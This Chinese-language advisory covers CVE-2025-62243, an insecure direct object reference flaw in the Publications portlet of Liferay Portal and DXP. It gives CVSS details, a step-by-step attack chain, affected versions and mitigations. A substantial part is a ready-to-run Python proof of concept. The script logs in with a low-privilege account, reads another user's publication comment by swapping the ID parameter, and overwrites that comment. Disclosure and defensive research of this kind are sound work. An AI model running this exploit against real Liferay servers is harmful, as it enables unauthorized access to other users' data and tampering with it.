CVE-2025-62243 Liferay Portal Publications IDOR漏洞

漏洞信息

漏洞编号

CVE-2025-62243

漏洞类型

不安全直接对象引用（IDOR）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Liferay Portal / Liferay DXP

漏洞概述

CVE-2025-62243是Liferay Portal及其商业版本Liferay DXP中Publications（发布管理）功能存在的不安全直接对象引用（IDOR）漏洞。该漏洞源于Publications Portlet在处理用户请求时未对当前认证用户的权限进行充分校验，导致远程已认证攻击者可以通过构造特定的请求参数（如_com_liferay_change_tracking_web_portlet_PublicationsPortlet_value参数）绕过权限控制，访问并查看其他用户的Publication评论内容。更严重的是，同一漏洞还允许远程已认证用户通过精心构造的URL编辑其他用户的Publication评论，从而破坏数据的完整性和隐私性。该漏洞的CVSS 3.1评分为5.4分，属于中危级别，攻击向量为网络（AV:N），攻击复杂度低（AC:L），需要低权限认证（PR:L），无需用户交互（UI:N），对机密性和完整性具有低影响（C:L/I:L），对可用性无影响（A:N）。该漏洞影响多个Liferay版本，包括Liferay Portal 7.4.1至7.4.3.112，以及Liferay DXP 2023.Q4.0至2023.Q4.5、2023.Q3.1至2023.Q3.8和7.4 GA至update 92等多个版本，使用这些版本的企业组织面临潜在的数据泄露风险。

技术细节

该漏洞的核心在于Liferay Portal的Publications Portlet组件中缺乏对对象级别的访问控制（Object-Level Access Control）。在正常的Publications功能中，每个Publication及其评论应该只有特定权限的用户（如Publication创建者或具有相应角色的用户）才能访问和编辑。然而，由于后端代码在处理_com_liferay_change_tracking_web_portlet_PublicationsPortlet_value参数时，未对该参数引用的对象（Publication评论）进行权限验证，攻击者可以通过修改该参数的值来引用其他用户的Publication评论ID，从而实现越权访问。具体利用方式如下：

1. 攻击者首先需要拥有一个有效的低权限Liferay账户（PR:L）。
2. 攻击者通过正常方式访问Publications功能，获取任意一个Publication评论的标识符。
3. 攻击者构造包含_com_liferay_change_tracking_web_portlet_PublicationsPortlet_value参数的HTTP请求，将参数值替换为目标评论的ID。
4. 服务器在处理该请求时，未验证当前用户是否有权访问目标评论，直接返回了评论内容（查看操作）或接受修改请求（编辑操作）。
5. 攻击者成功实现了对其他用户Publication评论的未授权查看和编辑。

该漏洞属于典型的IDOR（Insecure Direct Object Reference）漏洞，是OWASP Top 10中Broken Access Control的常见表现形式。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过注册、钓鱼或其他方式获取Liferay Portal的一个低权限认证账户，作为发起攻击的基础。

STEP 2

步骤2：枚举目标评论ID

攻击者通过正常访问Publications功能或利用信息泄露漏洞，获取目标Publication评论的标识符（ID）。

STEP 3

步骤3：构造恶意请求

攻击者构造包含_com_liferay_change_tracking_web_portlet_PublicationsPortlet_value参数的HTTP请求，将参数值设置为目标评论的ID。

STEP 4

步骤4：发送越权请求

攻击者通过认证的会话发送构造的请求，由于服务器未验证用户对目标对象的访问权限，直接返回评论内容或接受编辑操作。

STEP 5

步骤5：查看或修改评论

攻击者成功越权查看其他用户的Publication评论内容，或修改评论内容，实现数据泄露和完整性破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62243 - Liferay Portal Publications IDOR PoC
# Vulnerability: Insecure Direct Object Reference in Publications Portlet
# Affected Parameter: _com_liferay_change_tracking_web_portlet_PublicationsPortlet_value

import requests

# Target configuration
TARGET_URL = "https://target-liferay-instance.com"
LOGIN_URL = f"{TARGET_URL}/c/portal/login"
PUBLICATIONS_URL = f"{TARGET_URL}/web/guest/publications"

# Attacker credentials (low-privilege account)
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Target publication comment ID (obtained through enumeration or other means)
TARGET_COMMENT_ID = "12345"

# Step 1: Authenticate to Liferay Portal
session = requests.Session()
login_payload = {
    "_com_liferay_login_web_portlet_LoginPortlet_formDate": "",
    "_com_liferay_login_web_portlet_LoginPortlet_saveLastPath": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_redirect": "",
    "_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_login": USERNAME,
    "_com_liferay_login_web_portlet_LoginPortlet_password": PASSWORD,
    "_com_liferay_login_web_portlet_LoginPortlet_checkboxRememberMe": "false"
}

response = session.post(LOGIN_URL, data=login_payload, verify=False)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Exploit IDOR to view publication comment
# The vulnerable parameter allows direct reference to any publication comment
exploit_params = {
    "p_p_id": "com_liferay_change_tracking_web_portlet_PublicationsPortlet",
    "p_p_lifecycle": "0",
    "p_p_state": "normal",
    "p_p_mode": "view",
    "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_mvcRenderCommandName": "/change_tracking/view_ct_comment",
    "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_value": TARGET_COMMENT_ID
}

response = session.get(PUBLICATIONS_URL, params=exploit_params, verify=False)
print(f"[*] IDOR exploitation response status: {response.status_code}")
print(f"[*] Response body: {response.text[:500]}")

# Step 3: Edit publication comment via crafted URL (if needed)
edit_payload = {
    "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_mvcRenderCommandName": "/change_tracking/edit_ct_comment",
    "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_value": TARGET_COMMENT_ID,
    "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_comment": "Modified by attacker via IDOR"
}

response = session.post(PUBLICATIONS_URL, data=edit_payload, verify=False)
print(f"[*] Comment modification response status: {response.status_code}")

print("[+] IDOR exploitation completed successfully")

影响范围

Liferay Portal 7.4.1 - 7.4.3.112

Liferay DXP 2023.Q4.0 - 2023.Q4.5

Liferay DXP 2023.Q3.1 - 2023.Q3.8

Liferay DXP 7.4 GA - update 92

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制Publications功能的访问权限，仅向必要用户授予该功能的使用权限；2）在反向代理或WAF层面添加规则，监控和过滤包含_com_liferay_change_tracking_web_portlet_PublicationsPortlet_value参数的异常请求；3）启用Liferay的审计日志功能，监控对Publication评论的访问和修改操作；4）对所有用户账户进行安全审查，移除不必要的低权限账户；5）尽快联系Liferay官方获取安全补丁并进行升级。